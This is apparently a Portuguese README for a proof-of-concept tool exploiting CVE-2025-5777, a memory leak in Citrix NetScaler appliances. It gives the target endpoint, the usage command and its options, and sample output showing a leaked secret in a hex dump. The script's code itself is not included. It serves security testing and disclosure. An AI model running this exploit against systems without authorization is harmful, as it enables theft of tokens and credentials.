
Citrix NetScaler Vazamento de Memória PoC
Este script explora uma vulnerabilidade crítica de divulgação de memória em appliances Citrix NetScaler ADC/Gateway, identificada como CVE-2025-5777 (apelidada de CitrixBleed 2). Ele aciona um vazamento de memória através do endpoint /p/u/doAuthentication.do, revelando memória não inicializada contendo dados sensíveis como fragmentos XML, tokens e potencialmente credenciais.
aiohttpaiohttp, coloramaasyncio + aiohttp<InitialValue>python3 CVE-2025-5777.py http://<target> [options]
| Opção | Descrição |
|---|---|
-v, --verbose | Ativar saída de depuração verbosa |
-p <proxy> | Usar proxy HTTP (ex.: http://127.0.0.1:8080) |
-t <threads> | Número de requisições concorrentes (padrão: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler PoC de Vazamento de Memória (CVE-2025-5777)
Autor: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Vazamento de Memória InitialValue Encontrado!
[🧠] Despejo Hexadecimal:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] Vazamento confirmado. Continuando extração...
Esta prova de conceito é destinada apenas para testes de segurança educacionais e autorizados. Escaneamento ou exploração não autorizada de sistemas que você não possui é ilegal.